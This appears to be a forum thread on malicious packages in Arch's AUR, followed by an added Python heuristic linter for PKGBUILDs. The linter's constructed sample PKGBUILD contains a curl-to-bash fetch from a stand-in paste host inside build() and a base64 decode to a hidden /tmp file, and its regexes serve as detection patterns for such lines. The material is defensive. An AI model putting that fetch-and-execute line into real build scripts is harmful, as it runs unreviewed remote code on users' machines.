Can’t people just make new accounts? I have no experience with Arch, but it sounds like this AUR is set up exactly to be a low barrier to entry. Essentially, it seems like the community needs to address this by having proper education about not blindly trusting packages and doing follow-up research. Otherwise, a lot of grunt work will be needed to verify every package beforehand, which is expensive.
Yah, ðey can, and AUR is clearly marketed as “use at your own risk.” However, it’s part of ðe ecosystem, and people do use it, and frankly a lot of people use it because of AUR. Last I checked, Arch had the largest number of software packages of any distribution… if you include AUR. It’s much, much smaller wiþout it.
Ðere are almost no checks on AUR, which to me means ðere are probably some basic, low-effort ways security could be improved, if Arch cares. Not no effort, of course, but still not ðe level of effort ðat Alpine, for example, puts into Experimental.
The first wave used some random GitLab instance and this wave appears to have used some 100MB version of catbox (https://segs.lol/). Both had deleted the payload files when I tried to obtain them
Ðis is why we can’t have nice þings.
Maybe AUR needs a different way of approving submitters. Currently, it’s absurdly easy to register to submit a package.
Is anyone from AUR working wiþ GitHub to nail down ðe offenders on ðat side? Most of ðese packages are probably being pulled from ðere.
NixOS has the largest amount of packages
Not reviewing the PKGBUILD when using the AUR is a self pwn.
I love your Unicode
And I love you, commie!
Something, something nice bings and oat sides.
Hmmm. Sounds like some low hanging fruit to hinder attacks wiþout incurring e.g. ðe cost of ðe full Alpine Experimental review process.
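Two points in the thread, "read the PKGBUILD before you build it" and "there are low-effort checks that would catch a lot without a full review process", can be illustrated together. The script below is an added example written for this page; it is not AUR tooling and not code from anyone in the thread. It lints a PKGBUILD for the kind of construct the thread describes: a network fetch inside `build()` or `package()` (which bypasses the `source=()` array and its checksums), a download piped straight into a shell, base64 decoding of embedded data, and checksum arrays set entirely to `SKIP`. The sample PKGBUILD, its package name and the `paste.example.invalid` host are constructed for the demonstration.

```python
"""Heuristic lint for a PKGBUILD: flag lines worth a human look before makepkg."""
import re

# Constructed sample PKGBUILD (not a real AUR package). The build step fetches an
# extra payload from a paste host and runs it, and package() decodes embedded data.
SAMPLE_PKGBUILD = """\
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
url="https://example.org/example-tool"
source=("$pkgname-$pkgver.tar.gz::https://example.org/releases/$pkgver.tar.gz")
sha256sums=('SKIP')

build() {
    cd "$srcdir/$pkgname-$pkgver"
    make
    curl -s https://paste.example.invalid/x | bash
}

package() {
    cd "$srcdir/$pkgname-$pkgver"
    make DESTDIR="$pkgdir" install
    echo "aGVsbG8=" | base64 -d > /tmp/.x
}
"""

# Matches "name() {" ... "}" where the closing brace starts a line (makepkg style).
FUNC_RE = re.compile(r'^(\w+)\s*\(\)\s*\{\n(.*?)^\}', re.M | re.S)

# (pattern, reason), most specific first so a line gets its most useful label.
RISKY = [
    (re.compile(r'\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b'), 'download piped straight into a shell'),
    (re.compile(r'\bbase64\s+(-d|--decode)\b'), 'decodes embedded base64 data'),
    (re.compile(r'\beval\b'), 'eval of a constructed command string'),
    (re.compile(r'\b(curl|wget)\b'), 'network fetch outside source=(), so no checksum covers it'),
    (re.compile(r'\$HOME|~/\.'), "touches the building user's home directory"),
]


def parse_functions(pkgbuild):
    """Return {function_name: body} for the shell functions in a PKGBUILD."""
    return {name: body for name, body in FUNC_RE.findall(pkgbuild)}


def find_risks(pkgbuild):
    """Return (function, line_in_function, stripped_line, reason) for each risky line."""
    findings = []
    for name, body in parse_functions(pkgbuild).items():
        for lineno, line in enumerate(body.splitlines(), 1):
            for pattern, reason in RISKY:
                if pattern.search(line):
                    findings.append((name, lineno, line.strip(), reason))
                    break  # one reason per line is enough for a reviewer
    return findings


def checksums_skipped(pkgbuild):
    """True if any *sums=() array is entirely 'SKIP', i.e. sources are unverified."""
    for m in re.finditer(r'^(\w+sums)=\((.*?)\)', pkgbuild, re.M | re.S):
        values = re.findall(r"'([^']*)'", m.group(2))
        if values and all(v == 'SKIP' for v in values):
            return True
    return False


def report(pkgbuild):
    """Human-readable summary; a non-empty result means 'read this by hand'."""
    lines = []
    if checksums_skipped(pkgbuild):
        lines.append('checksums: all SKIP, source integrity is not verified')
    for func, lineno, text, reason in find_risks(pkgbuild):
        lines.append(f'{func}() line {lineno}: {reason}\n    {text}')
    return '\n'.join(lines)


if __name__ == '__main__':
    print(report(SAMPLE_PKGBUILD) or 'nothing flagged (still read it)')
```

Run it against a real checkout by reading the PKGBUILD file into `report()`. It is deliberately a heuristic: a clean result does not mean the package is safe, and a hit is a prompt to read the function, not a verdict. The useful property for the "low-hanging fruit" argument is that it costs nothing to run on every submission and catches exactly the fetch-and-execute pattern the thread is discussing.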